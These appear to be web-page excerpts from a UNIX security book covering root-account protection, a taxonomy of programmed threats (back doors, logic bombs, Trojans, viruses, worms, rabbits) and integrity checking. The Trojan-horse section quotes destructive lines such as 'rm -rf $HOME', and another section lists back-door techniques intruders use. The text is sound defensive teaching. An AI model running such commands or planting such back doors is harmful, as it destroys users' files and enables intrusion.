Email: Nicholson.M%wec@dialcom.tymnet.com<br />

Voice: +1-412-642-3097<br />

FAX: +1-412-642-3871<br />

F.2 U. S. Government<br />

Organizations<br />

G. Table of IP Services<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appf_03.htm (10 of 10) [2002-04-12 10:44:45]


[Chapter 8] 8.5 Protecting the root Account<br />

Chapter 8<br />

Defending Your Accounts<br />

8.5 Protecting the root Account<br />

Versions of <strong>UNIX</strong> that are derived from Berkeley <strong>UNIX</strong> systems provide two additional methods of<br />

protecting the root account:<br />

●<br />

●<br />

<strong>Sec</strong>ure terminals<br />

The wheel group<br />

A few systems provide an additional set of features, known as a trusted path and a trusted computing<br />

base (TCB).<br />

8.5.1 <strong>Sec</strong>ure Terminals<br />

Because every <strong>UNIX</strong> system has an account named root, this account is often a starting point for people<br />

who try to break into a system by guessing passwords. One way to decrease the chance of this is to<br />

restrict logins from all but physically guarded terminals. If a terminal is marked as restricted, the<br />

superuser cannot log into that terminal from the login: prompt. (However, a legitimate user who knows<br />

the superuser password can still use the su command on that terminal after first logging in.)<br />

On a SVR4 machine, you can restrict the ability of users to log in to the root account from any terminal<br />

other than the console. You accomplish this by editing the file /etc/default/login and inserting the line:<br />

CONSOLE=/dev/console<br />

This line prevents anyone from logging in as root on any terminal other than the console. If the console is<br />

not safe, you may set this to the pathname of a nonexistent terminal.<br />

Some older Berkeley-derived versions of <strong>UNIX</strong> allow you to declare terminal lines and network ports as<br />

either secure or not secure. You declare a terminal secure by appending the word "secure" to the<br />

terminal's definition in the file /etc/ttys:[5]<br />

[5] Under SunOS and some other versions of <strong>UNIX</strong>, this file is called /etc/ttytab. Some<br />

older versions of BSD store the list of secure ports in the file /etc/securettys.<br />

tty01 "/usr/etc/getty std.9600" vt100 on secure<br />

tty02 "/usr/etc/getty std.9600" vt100 on<br />

In this example taken from a /etc/ttys file, terminal tty01 is secure and terminal tty02 is not. This means<br />

that root can log into terminal tty01 but not tty02.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_05.htm (1 of 3) [2002-04-12 10:44:45]


[Chapter 8] 8.5 Protecting the root Account<br />

Note that after changing the /etc/ttys file, you may need to send out a signal to initialize before the<br />

changes will take effect. On a BSD-derived system, run:<br />

# kill -1 1<br />

Other systems vary, so check your own system's documentation.<br />

You should carefully consider which terminals are declared secure. Many sites, for example, make<br />

neither their dial in modems nor their network connections secure; this prevents intruders from using<br />

these connections to guess the system's superuser password. Terminals in public areas should also not be<br />

declared secure. Being "not secure" does not prevent a person from executing commands as the<br />

superuser: it simply forces users to log in as themselves and then use the su command to become root.<br />

This method adds an extra layer of protection and accounting.<br />

On the other hand, if your computer has a terminal in a special machine room, you may wish to make this<br />

terminal secure so you can quickly use it to log into the superuser account without having first to log into<br />

your own account.<br />

NOTE: Many versions of <strong>UNIX</strong> require that you type the superuser password when booting<br />

in single-user mode if the console is not listed as "secure" in the /etc/ttys file. Obviously, if<br />

you do not mark your console "secure," you enhance your system's security.<br />

8.5.2 The wheel Group<br />

Another mechanism that further protects the root account is the wheel group. A user who is not in the<br />

wheel group cannot use the su command to become the superuser. Be very careful about who you place<br />

in the wheel group; on some versions of <strong>UNIX</strong>, people in the wheel group can provide their own<br />

passwords to su - instead of the superuser password - and become root.<br />

8.5.3 TCB and Trusted Path<br />

When you are worried about security, you want to ensure that the commands you execute are the real<br />

system commands and not something designed to steal your password or corrupt your system. Some<br />

versions of <strong>UNIX</strong> have been augmented with special features to provide you with this additional<br />

assurance.<br />

8.5.3.1 Trusted path<br />

Consider the case where we approach a terminal and wish to log in to the system. What is a potential<br />

problem? What if someone has left a program - a Trojan Horse[6] program - running on the terminal? If<br />

the program has been designed to capture our password by presenting a prompt that looks like the real<br />

login program, we might not be able to tell the difference until the damage is done. If the program has<br />

been very carefully crafted to catch signals and otherwise mimic the login program behavior, we might<br />

not catch on at all. And if you are not using one-time passwords (described later in <strong>Sec</strong>tion 8.7,<br />

"One-Time Passwords), you may be giving someone else access to your account.<br />

[6] Trojan Horse programs are defined in more detail in Chapter 11, Protecting Against<br />

Programmed Threats.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_05.htm (2 of 3) [2002-04-12 10:44:45]


[Chapter 8] 8.5 Protecting the root Account<br />

The solution to this is to provide a trusted path to the login program from our terminal. Some <strong>UNIX</strong><br />

systems, including AIX and Ultrix, can be configured to recognize a special signal from hardwired<br />

terminals (including workstation consoles) for this purpose. When the signal (usually a BREAK, or some<br />

sequence of control characters) is received by the low-level terminal driver, the driver sends an<br />

unstoppable signal to all processes still connected to the terminal, that terminates them. Thereafter, a new<br />

session is started and the user can be assured that the next prompt for a login is from the real system<br />

software.<br />

For a trusted path mechanism to work, you must have a hardwired connection to the computer: any<br />

networked connection can be intercepted and spoofed.[7] The system administrator must enable the<br />

trusted path mechanism and indicate to which terminal lines it is to be applied. As this may require<br />

reconfiguring your kernel and rebooting (to include the necessary terminal code), you should carefully<br />

read your vendor documentation for instructions on how to enable this feature.<br />

[7] Network login have other potential problems, such as password sniffing.<br />

If your system provides the trusted path mechanism and you decide to use it, be sure to limit superuser<br />

logins to only the associated terminals!<br />

8.5.3.2 Trusted computing base<br />

After we've logged in, we may be faced with situations where we are not quite certain if we are executing<br />

a trusted system command or a command put in place by a prankster or intruder. If we are running as the<br />

superuser, this uncertainty is a recipe for disaster, and is why we repeatedly warn you throughout the<br />

book to leave the current directory out of your search path, and to keep system commands protected.<br />

Some systems can be configured to mark executable files as part of the trusted computing base (TCB).<br />

Files in the TCB are specially marked by the superuser as trusted. When running a special trusted shell,<br />

only files with the TCB marking can be executed with exec (). Thus, only trusted files can be executed.<br />

How do files get their trusted markings? New files and modified TCB files have the marking turned off.<br />

The superuser can mark new executable files as part of the TCB; on some systems, this process can only<br />

be done if the file was created with programs in the TCB. In theory, an attacker will not be able to be<br />

superuser, (or set the marking on files) and thus the superuser cannot accidentally execute dangerous<br />

code.<br />

This feature is especially worthwhile if you are administering a multiuser system, or if you tend to import<br />

files and filesystems from other, potentially untrusted, systems. However, you must keep in mind that the<br />

marking does not necessarily mean that the program is harmless. As the superuser can mark files as part<br />

of the TCB, some of those files might be dangerous. Thus, remember that the TCB, like any other<br />

feature, only reinforces overall security.<br />

8.4 Managing Dormant<br />

Accounts<br />

8.6 The <strong>UNIX</strong> Encrypted<br />

Password System<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_05.htm (3 of 3) [2002-04-12 10:44:45]


[Chapter 11] Protecting Against Programmed Threats<br />

Chapter 11<br />

11. Protecting Against Programmed<br />

Threats<br />

Contents:<br />

Programmed Threats: Definitions<br />

Damage<br />

Authors<br />

Entry<br />

Protecting Yourself<br />

Protecting Your System<br />

The day is Friday, August 13, 1999. Hilary Nobel, a vice president at a major accounting firm, turns on<br />

her desktop computer to finish working on the financial analysis that she has been spending the last two<br />

months developing. But instead of seeing the usual login: and password: prompts, she sees a devilish<br />

message:<br />

Unix 5.0 Release 4<br />

Your operating license has been revoked by Data Death.<br />

Encrypting all user files....<br />

Call +011 49 4555 1234 to purchase the decryption key.<br />

What has happened? And how could Ms. Nobel have protected herself from the catastrophe?<br />

11.1 Programmed Threats: Definitions<br />

Computers are designed to execute instructions one after another. These instructions usually do<br />

something useful - calculate values, maintain databases, and communicate with users and with other<br />

systems. Sometimes, however, the instructions executed can be damaging or malicious in nature. When<br />

the damage happens by accident, we call the code involved a software bug. Bugs are perhaps the most<br />

common cause of unexpected program behavior.<br />

But if the source of the damaging instructions is an individual who intended that the abnormal behavior<br />

occur, we call the instructions malicious code, or a programmed threat. Some people use the term<br />

malware to describe malicious software.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch11_01.htm (1 of 9) [2002-04-12 10:44:46]


[Chapter 11] Protecting Against Programmed Threats<br />

There are many different kinds of programmed threats. Experts classify threats by the way they behave,<br />

how they are triggered, and how they spread. In recent years, occurrences of these programmed threats<br />

have been described almost uniformly by the media as viruses. However, viruses make up only a small<br />

fraction of the malicious code that has been devised. Saying that all programmed data loss is caused by<br />

viruses is as inaccurate as saying that all human diseases are caused by viruses.<br />

Experts who work in this area have formal definitions of all of these types of software. However, not all<br />

the experts agree on common definitions. Thus, we'll consider the following practical definitions of<br />

malicious software:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

<strong>Sec</strong>urity tools and toolkits, which are usually designed to be used by security professionals to<br />

protect their sites, but which can also be used by unauthorized individuals to probe for weaknesses<br />

Back doors, sometimes called trap doors, which allow unauthorized access to your system<br />

Logic bombs, or hidden features in programs that go off after certain conditions are met<br />

Viruses, or programs that modify other programs on a computer, inserting copies of themselves<br />

Worms, programs that propagate from computer to computer on a network, without necessarily<br />

modifying other programs on the target machines<br />

Trojan horses, or programs that appear to have one function but actually perform another function<br />

Bacteria, or rabbit programs, make copies of themselves to overwhelm a computer system's<br />

resources<br />

Some of the threats mentioned above also have nondestructive uses. For example, worms can be used to<br />

do distributed computation on idle processors; back doors are useful for debugging programs; and viruses<br />

can be written to update source code and patch bugs. The purpose, not the approach, makes a<br />

programmed threat threatening.<br />

This chapter provides a general description of each threat, explains how it can affect your <strong>UNIX</strong> system,<br />

and describes how you can protect yourself against it. For more detailed information, refer to the books<br />

mentioned in Appendix D, Paper Sources.<br />

11.1.1 <strong>Sec</strong>urity Tools<br />

Recently, many programs have been written that can automatically scan for computer security<br />

weaknesses. These programs can quickly probe a computer or an entire network of computers for<br />

hundreds of weaknesses within a short period of time. SATAN, Tiger, ISS, and COPS are all examples<br />

of such tools.<br />

Most security tools are designed to be used by computer professionals to find problems with their own<br />

sites. The tools are highly automated and thorough. Naturally, these tools need to report the problems<br />

that they find, so that they can be corrected. Unfortunately, this requirement makes these tools useful to<br />

someone seeking flaws to exploit. Because these tools are readily obtainable, they are sometimes used by<br />

attackers seeking to compromise a system.<br />

There are also programs and tool sets whose only function is to attack computers. These programs are<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch11_01.htm (2 of 9) [2002-04-12 10:44:46]


[Chapter 11] Protecting Against Programmed Threats<br />

increasingly sophisticated and readily available on the <strong>Internet</strong> and various bulletin boards. These often<br />

require minimal knowledge and sophistication to use. Sites have reported break-ins from people using<br />

these tools to manipulate protocol-timing vulnerabilities and to change kernel data structures, only to<br />

have the intruders try to issue DOS commands on the <strong>UNIX</strong> machines: they were completely unfamiliar<br />

with <strong>UNIX</strong> itself!<br />

Because of the availability of security tools and high-quality attackware, you must be aware of potential<br />

vulnerabilities in your systems, and keep them protected and monitored. Some people believe that the<br />

only effective strategy for the security professional is to obtain the tools and run them before the bad<br />

guys do. There is some merit to this argument, but there are also many dangers. Some of the tools are not<br />

written with safety or portability in mind, and may damage your systems. Other tools can be<br />

booby-trapped to compromise your system clandestinely, when you think you are simply scanning for<br />

problems. And then there are always the questions of whether the tools are scanning for real problems,<br />

and whether system administrators can understand the output.<br />

For all these reasons, we suggest that you be aware of the tools and toolkits that may be available, but<br />

don't rush to use them yourself unless you are very certain you understand what they do and how they<br />

might help you secure your own system.<br />

11.1.2 Back Doors and Trap Doors<br />

Back doors, also called trap doors, are pieces of code written into applications or operating systems to<br />

grant programmers access to programs without requiring them to go through the normal methods of<br />

access authentication. Back doors and trap doors have been around for many years. They're typically<br />

written by application programmers who need a means of debugging or monitoring code that they are<br />

developing.<br />

Most back doors are inserted into applications that require lengthy authentication procedures, or long<br />

setups, requiring a user to enter many different values to run the application. When debugging the<br />

program, the developer may wish to gain special privileges, or to avoid all the necessary setup and<br />

authentication steps. The programmer also may want to ensure that there is a method of activating the<br />

program should something be wrong with the authentication procedure that is being built into the<br />

application. The back door is code that either recognizes some special sequence of input, or is triggered<br />

by being run from a certain user ID. It then grants special access.<br />

Back doors become threats when they're used by unscrupulous programmers to gain unauthorized access.<br />

They are also a problem when the initial application developer forgets to remove a back door after the<br />

system has been debugged and some other individual discovers the door's existence.<br />

Perhaps the most famous <strong>UNIX</strong> back door was the DEBUG option of the sendmail program, exploited<br />

by the <strong>Internet</strong> worm program in November of 1988. The DEBUG option was added for debugging<br />

sendmail. Unfortunately, the DEBUG option also had a back door in it, which allowed remote access of<br />

the computer over the network without an initial login. The DEBUG option was accidentally left enabled<br />

in the version of the program that was distributed by Sun Microsystems, Digital Equipment Corporation,<br />

and others.<br />

Sometimes, a cracker inserts a back door in a system after he successfully penetrates that system, or to<br />

become root, at a later time. The back door gives the cracker a way to get back into the system. Back<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch11_01.htm (3 of 9) [2002-04-12 10:44:46]


[Chapter 11] Protecting Against Programmed Threats<br />

doors take many forms. A cracker might:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Install an altered version of login, telnetd, ftpd, rshd, or some other program; the altered program<br />

usually accepts a special input sequence and spawns a shell for the user<br />

Plant an entry in the .rhosts file of a user or the superuser to allow future unauthorized access for<br />

the attacker<br />

Change the /etc/fstab file on an NFS system to remove the nosuid designator, allowing a legitimate<br />

user to become root without authorization through a remote program<br />

Add an alias to the mail system, so that when mail is sent to that alias, the mailer runs a program of<br />

the cracker's designation, possibly creating an entry into the system<br />

Change the owner of the /etc directory so the intruder can rename and subvert files such as<br />

/etc/passwd and /etc/group at a later time<br />

Change the file permissions of /dev/kmem or your disk devices so they can be modified by<br />

someone other than root<br />

Install a harmless-looking shell file somewhere that sets SUID so a user can use the shell to<br />

become root<br />

Change or add a network service to provide a root shell to a remote caller<br />

Coupled with all of these changes, the intruder can modify timestamps, checksums, and audit programs<br />

so that the system administrator cannot detect the alteration!<br />

Protecting against back doors is complicated. The foremost defense is to check the integrity of important<br />

files regularly (see Chapter 9, Integrity Management). Also, scan the system periodically for SUID/SGID<br />

files, and check permissions and ownership of important files and directories periodically. For more<br />

information, see Chapter 5, The <strong>UNIX</strong> Filesystem, and Chapter 6, Cryptography.<br />

Checking new software is also important, because new software - especially from sources that are<br />

unknown or not well-known - can (and occasionally does) contain back doors. If possible, read through<br />

and understand the source code of all software (if available) before installing it on your system. If you<br />

are suspicious of the software, don't use it, especially if it requires special privileges (being SUID root).<br />

Accept software only from trusted sources.<br />

As a matter of good policy, new software should first be installed on some noncritical systems for testing<br />

and familiarization. This practice gives you an opportunity to isolate problems, identify incompatibilities,<br />

and note quirks. Don't install new software first on a "live" production system!<br />

Note that you should not automatically trust software from a commercial firm or group. Sometimes<br />

commercial firms insert back doors into their code to allow for maintenance, or recovering lost<br />

passwords. These back doors might be secret today, but become well-known tomorrow. As long as<br />

customers (you) are willing to purchase software that comes with broad disclaimers of warranty and<br />

liability, there will be little incentive for vendors to be accountable for the code they sell. Thus, you<br />

might want to seek other, written assurances about any third-party code you buy and install on your<br />

computers.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch11_01.htm (4 of 9) [2002-04-12 10:44:46]


[Chapter 11] Protecting Against Programmed Threats<br />

11.1.3 Logic Bombs<br />

Logic bombs are programmed threats that lie dormant in commonly used software for an extended period<br />

of time until they are triggered; at this point, they perform a function that is not the intended function of<br />

the program in which they are contained. Logic bombs usually are embedded in programs by software<br />

developers who have legitimate access to the system.<br />

Conditions that might trigger a logic bomb include the presence or absence of certain files, a particular<br />

day of the week, or a particular user running the application. The logic bomb might check first to see<br />

which users are logged in, or which programs are currently in use on the system. Once triggered, a logic<br />

bomb can destroy or alter data, cause machine halts, or otherwise damage the system. In one classic<br />

example, a logic bomb checked for a certain employee ID number and then was triggered if the ID failed<br />

to appear in two consecutive payroll calculations (i.e., the employee had left the company).<br />

Time-outs are a special kind of logic bomb that are occasionally used to enforce payment or other<br />

contract provisions. Time-outs make a program stop running after a certain amount of time unless some<br />

special action is taken. The SCRIBE text formatting system uses quarterly time-outs to require licensees<br />

to pay their quarterly license fees.<br />

Protect against malicious logic bombs in the same way that you protect against back doors: don't install<br />

software without thoroughly testing it and reading it. Keep regular backups so that if something happens,<br />

you can restore your data.<br />

11.1.4 Trojan Horses<br />

Trojan horses are named after the Trojan horse of myth. Analogous to their namesake, modern-day<br />

Trojan horses resemble a program that the user wishes to run - a game, a spreadsheet, or an editor. While<br />

the program appears to be doing what the user wants, it actually is doing something else unrelated to its<br />

advertised purpose, and without the user's knowledge. For example, the user may think that the program<br />

is a game. While it is printing messages about initializing databases and asking questions like "What do<br />

you want to name your player?" and "What level of difficulty do you want to play?" the program may<br />

actually be deleting files, reformatting a disk, or otherwise altering information. All the user sees, until<br />

it's too late, is the interface of a program that the user is trying to run. Trojan horses are, unfortunately, as<br />

common as jokes within some programming environments. They are often planted as cruel tricks on<br />

bulletin boards and circulated among individuals as shared software.<br />

One memorable example was posted as a shar format file on one of the Usenix source code groups<br />

several years back. The shar file was long, and contained commands to unpack a number of files into the<br />

local directory. However, a few hundred lines into the shar file was a command sequence like this one:<br />

rm -rf $HOME<br />

echo Boom!<br />

Many sites reported losing files to this code. A few reported losing most of their filesystems because they<br />

were unwise enough to unpack the software while running as user root.<br />

An attacker can embed commands in places other than compiled programs. Shell files (especially shar<br />

files), awk, Perl, and sed scripts, TeX files, PostScript files, MIME-encoded mail, WWW pages, and<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch11_01.htm (5 of 9) [2002-04-12 10:44:46]


[Chapter 11] Protecting Against Programmed Threats<br />

even editor buffers can all contain commands that can cause you unexpected problems.<br />

Commands embedded in editor buffers present an especially subtle problem. Most editors allow<br />

commands to be embedded in the first few lines or the last few lines of files to let the editor<br />

automatically initialize itself and execute commands. By planting the appropriate few lines in a file, you<br />

could wreak all kinds of damage when the victim reads the buffer into his or her editor. See the<br />

documentation for your own editor to see how to disable this feature; see the later section called "Startup<br />

File Attacks," for the instructions to do this in GNU Emacs.<br />

Another form of a Trojan horse makes use of block-send commands or answerback modes in some<br />

terminals. Many brands of terminals support modes where certain sequences of control characters will<br />

cause the current line or status line to be answered back to the system as if it had been typed on the<br />

keyboard. Thus, a command can be embedded in mail that may read like this one:<br />

rm -rf $HOME & logout <br />

When the victim reads her mail, the line is echoed back as a command to be executed at the next prompt,<br />

and the evidence is wiped off the screen. By the time the victim logs back in, she is too late. Avoid or<br />

disable this feature if it is present on your terminal!<br />

A related form of a Trojan coerces a talk program into transmitting characters that lock up a keyboard, do<br />

a block send as described above, or otherwise change terminal settings. There are several utility<br />

programs available off the net to perform these functions, and more than a few multi-user games and IRC<br />

clients have hidden code to allow a knowledgeable user to execute these functions.<br />

The best way to avoid Trojan horses is to never execute anything, as a program or as input to an<br />

interpreter, until you have carefully read through the entire file. When you read the file, use a program or<br />

editor that displays control codes in a visible manner. If you do not understand what the file does, do not<br />

run it until you do. And never, ever run anything as root unless you absolutely must.<br />

If you are unpacking files or executing scripts for the first time, you might wish to do so on a secondary<br />

machine or use the chroot() system call in a restricted environment, to prevent the package from<br />

accessing files or directories outside its work area. (Starting a chroot() session requires superuser<br />

privilege, but you can change your user ID to a nonprivileged ID after the call is executed.)<br />

11.1.5 Viruses<br />

A true virus is a sequence of code that is inserted into other executable code, so that when the regular<br />

program is run, the viral code is also executed. The viral code causes a copy of itself to be inserted in one<br />

or more other programs. Viruses are not distinct programs - they cannot run on their own, and need to<br />

have some host program, of which they are a part, executed to activate them.<br />

Viruses are usually found on personal computers running unprotected operating systems, such as the<br />

Apple Macintosh and the IBM PC. Although viruses have been written for <strong>UNIX</strong> systems,[1] traditional<br />

viruses do not currently appear to pose a major threat to the <strong>UNIX</strong> community. Basically, any task that<br />

could be accomplished by a virus - from gaining root access to destroying files - can be accomplished<br />

through other, less difficult means. While <strong>UNIX</strong> binary-file viruses have been written as an intellectual<br />

curiosity, they are unlikely to become a major threat.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch11_01.htm (6 of 9) [2002-04-12 10:44:46]


[Chapter 11] Protecting Against Programmed Threats<br />

[1] For a detailed account of one such virus, see "Experiences with Viruses on <strong>UNIX</strong><br />

Systems" by Tom Duff in Computing Systems, Usenix, Volume 2, Number 2, Spring 1989.<br />

The increased popularity of World Wide Web browsers and their kin, plus an increased market for<br />

cross-platform compatibility of office productivity tools, lead to an environment where macro viruses<br />

and Trojan horses can thrive and spread. This environment in <strong>UNIX</strong> includes:<br />

●<br />

●<br />

●<br />

●<br />

PostScript files that are FTP'd or transferred via WWW and automatically interpreted. PostScript<br />

can embed commands to alter the filesystem and execute commands, and an interpreter without a<br />

safety switch can cause widespread damage.<br />

WWW pages containing applets in languages such as Java that are downloaded and executed on<br />

the client host. Some of these languages allow the applets to open network connections to arbitrary<br />

machines, to spawn other processes, and to modify files. Denial of service attacks, and possibly<br />

others, are trivial using these mechanisms.<br />

MIME-encoded mail can contain files designed to overwrite local files, or contain encoded<br />

applications that, when run, perform malicious acts, including resending the same malicious code<br />

back out in mail.<br />

PC-based productivity tools that have been ported to <strong>UNIX</strong>. Many large companies want to<br />

transition their PC users to <strong>UNIX</strong> using the same software that they use on PCs. Thus, there is a<br />

market for firms who make PC software to have identical behavior in a <strong>UNIX</strong>-based version of<br />

their code. The result is software that can exchange macro-based viruses with PCs through sharing<br />

of data and macro source files.<br />

There is also the rather interesting case now of versions of <strong>UNIX</strong> (and <strong>UNIX</strong>-like systems, such as<br />

Linux) that run on PC hardware. Some PC-based viruses, and boot-sector viruses in particular, can<br />

actually infect PCs running <strong>UNIX</strong>, although the infection is unlikely to spread very far. The computer<br />

usually becomes infected when a person leaves an infected floppy disk in the computer's disk drive and<br />

then reboots. The computer attempts to boot the floppy disk, and the virus executes, copying itself onto<br />

the computer's hard disk. The usual effect of these viruses is to make the <strong>UNIX</strong> PC fail to boot. That is<br />

because the viruses are written for PC execution and not for <strong>UNIX</strong>.<br />

You can protect yourself against viruses by means of the same techniques you use to protect your system<br />

against back doors and crackers:<br />

1.<br />

2.<br />

3.<br />

4.<br />

5.<br />

6.<br />

Run integrity checks on your system on a regular basis; this practice helps detect viruses as well as<br />

other tampering. (See Chapter 9.)<br />

Don't include nonstandard directories (including .) in your execution search path.<br />

Don't leave common bin directories (/bin, /usr/bin, /usr/ucb, etc.) unprotected.<br />

Set the file permissions of commands to a mode such as 555 or 511 to protect them against<br />

unauthorized alteration.<br />

Don't load binary code onto your machine from untrusted sources.<br />

Make sure your own directories are writable only by you and not by group or world.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch11_01.htm (7 of 9) [2002-04-12 10:44:46]


[Chapter 11] Protecting Against Programmed Threats<br />

If you are using <strong>UNIX</strong> on a PC machine, be sure not to boot from questionable diskettes. The most<br />

widespread viruses in the PC world, and the ones that can have some effect on a <strong>UNIX</strong> PC, are boot<br />

viruses. These become active during the start-up process from an infected disk, and they alter the boot<br />

sector(s) on the internal hard disk. If you restart your PC with a diskette in the drive that has also been in<br />

an infected PC, you won't be able to boot to <strong>UNIX</strong>, and you may transfer a PC virus to your hard-disk<br />

boot block. The best defense is to always ensure that there is no floppy disk in your PC when you reboot:<br />

reboot from your hard drive.<br />

If your <strong>UNIX</strong> PC is infected with a virus, then you can disinfect it by booting from a trusted floppy and<br />

then rewriting the boot block.<br />

11.1.6 Worms<br />

Worms are programs that can run independently and travel from machine to machine across network<br />

connections; worms may have portions of themselves running on many different machines. Worms do<br />

not change other programs, although they may carry other code that does (for example, a true virus). We<br />

have seen about a dozen network worms, at least two of which were in the <strong>UNIX</strong> environment. Worms<br />

are difficult to write, but can cause much damage. Developing a worm requires a network environment<br />

and an author who is familiar not only with the network services and facilities, but also with the<br />

operating facilities required to support them once they've reached the machine.[2]<br />

[2] See "Computer Viruses and Programmed Threats" in Appendix D for other sources of<br />

information about the <strong>Internet</strong> worm of 1988, which clogged machines and networks as it<br />

spread.<br />

Protection against worm programs is like protection against break-ins. If an intruder can enter your<br />

machine, so can a worm program. If your machine is secure from unauthorized access, it should be<br />

secure from a worm program. All of our advice about protecting against unauthorized access applies here<br />

as well.<br />

An anecdote illustrates this theory. At the <strong>Sec</strong>ond Conference on Artificial Life in Santa Fe, New<br />

Mexico, in 1989, Russell Brand recounted a story of how one machine on which he was working<br />

appeared to be under attack by a worm program. Dozens of connections, one after another, were made to<br />

the machine. Each connection had the same set of commands executed, one after another, as attempts<br />

were made (and succeeded) to break in.<br />

After noticing that one sequence of commands had some typing errors, the local administrators realized<br />

that it wasn't a worm attack, but a large number of individuals breaking into the machine. Apparently,<br />

one person had found a security hole, had broken in, and had then posted a how-to script to a local<br />

bulletin board. The result: dozens of BBS users trying the same "script" to get on themselves! The sheer<br />

number of attempts being made at almost the same time appeared to be some form of automated attack.<br />

One bit of advice we do have: if you suspect that your machine is under attack by a worm program across<br />

the network, call one of the computer-incident response centers (see Appendix F, Organizations) to see if<br />

other sites have made similar reports. You may be able to get useful information about how to protect or<br />

recover your system in such a case. We also recommend that you sever your network connections<br />

immediately to isolate your local network. If there is already a worm program loose in your system, you<br />

may help prevent it from spreading, and you may also prevent important data from being sent outside of<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch11_01.htm (8 of 9) [2002-04-12 10:44:46]


[Chapter 11] Protecting Against Programmed Threats<br />

your local area network. If you've done a good job with your backups and other security, little should be<br />

damaged.<br />

11.1.7 Bacteria and Rabbits<br />

Bacteria, also known as rabbits, are programs that do not explicitly damage any files. Their sole purpose<br />

is to replicate themselves. A typical bacteria or rabbit program may do nothing more than execute two<br />

copies of itself simultaneously on multiprogramming systems, or perhaps create two new files, each of<br />

which is a copy of the original source file of the bacteria program. Both of those programs then may copy<br />

themselves twice, and so on. Bacteria reproduce exponentially, eventually taking up all the processor<br />

capacity, memory, or disk space, denying the user access to those resources.<br />

This kind of attack is one of the oldest forms of programmed threats. Users of some of the earliest<br />

multiprocessing machines ran these programs either to take down the machine or simply to see what<br />

would happen. Machines without quotas and resource-usage limits are especially susceptible to this form<br />

of attack.<br />

The kinds of bacteria programs you are likely to encounter on a <strong>UNIX</strong> system are described in Chapter<br />

25, Denial of Service Attacks and Solutions.<br />

NOTE: We suggest that you be extremely cautious about importing source code and<br />

command files from outside, untrusted sources. Programs shipped on Usenet source code<br />

groups should not be considered as completely trusted, nor should source code obtained by<br />

FTP (e.g., do you read the entire source code for EMACS each time a new release is issued?<br />

How do you know there is no unfriendly code patched in?). We strongly urge that you never<br />

download binary files from newsgroups and accept only binary code from sites under<br />

conditions where you absolutely trust the source.<br />

10.8 Managing Log Files 11.2 Damage<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch11_01.htm (9 of 9) [2002-04-12 10:44:46]


[Chapter 9] 9.2 Detecting Change<br />

9.2 Detecting Change<br />

Chapter 9<br />

Integrity Management<br />

As we saw in the last section, there may be circumstances in which we cannot use read-only media to protect files and<br />

directories. Or, we may have a case in which some of the important files are relatively volatile and need to change on a<br />

regular basis. In cases such as these, we want to be able to detect if unauthorized changes occur.<br />

There are basically three approaches to detecting changes to files and inodes. The first and most certain way is to use<br />

comparison copies of the data to be monitored. A second way is to monitor metadata about the items to be protected. This<br />

includes monitoring the modification time of entries as kept by the operating system, and monitoring any logs or audit<br />

trails that show alterations to files. The third way is to use some form of signature of the data to be monitored, and to<br />

periodically recompute and compare the signature against a stored value. Each of these approaches has drawbacks and<br />

benefits, as we discuss below.<br />

9.2.1 Comparison Copies<br />

The most direct and assured method of detecting changes to data is to keep a copy of the unaltered data, and do a<br />

byte-by-byte comparison when needed. If there is a difference, this indicates not only that a change occurred, but what that<br />

change involved. There is no more certain and complete method of detecting changes.<br />

Comparison copies, however, are unwieldy. They require that you keep copies of every file of interest. Not only does such<br />

a method require twice as much storage as the original files, it also may involve a violation of license or copyright of the<br />

files (copyright law allows one copy for archival purposes, and your distribution media is that one copy).[3] To use a<br />

comparison copy means that both the original and the copy must be read through byte by byte each time a check is made.<br />

And, of course, the comparison copy needs to be saved in a protected location.<br />

[3] Copyright law does not allow for copies on backups.<br />

Even with these drawbacks, comparison copies have a particular benefit - if you discover an unauthorized change, you can<br />

simply replace the altered version with the saved comparison copy, thus restoring the system to normal.<br />

9.2.1.1 Local copies<br />

One standard method of storing comparison copies is to put them on another disk. Many people report success at storing<br />

copies of critical system files on removable media, such as Syquest or Bernoulli drives. If there is any question about a<br />

particular file, the appropriate disk is placed in the drive, mounted, and compared. If you are careful about how you<br />

configure these disks, you get the added (and valuable) benefit of having a known good version of the system to boot up if<br />

the system is compromised by accident or attack.<br />

A second standard method of storing comparison copies is to make on-disk copies somewhere else on the system. For<br />

instance, you might keep a copy of /bin/login in /usr/adm/.hidden/.bin/login. Furthermore, you might compress and/or<br />

encrypt the copy to help reduce disk use and keep it safe from tampering; if an attacker were to alter both the original<br />

/bin/login and the copy, then any comparison you made would show no change. The disadvantage to compression and<br />

encryption is that it then requires extra processing to recover the files if you want to compare them against the working<br />

copies. This extra effort may be significant if you wish to do comparisons daily (or more often!).<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch09_02.htm (1 of 7) [2002-04-12 10:44:47]


